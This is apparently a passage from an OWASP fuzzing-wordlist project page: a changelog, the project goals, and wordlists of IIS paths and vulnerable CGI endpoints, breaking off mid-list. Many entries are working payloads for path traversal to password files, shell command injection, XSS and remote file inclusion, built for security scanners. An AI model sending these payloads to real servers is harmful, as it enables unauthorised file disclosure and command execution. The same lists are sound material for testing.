*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
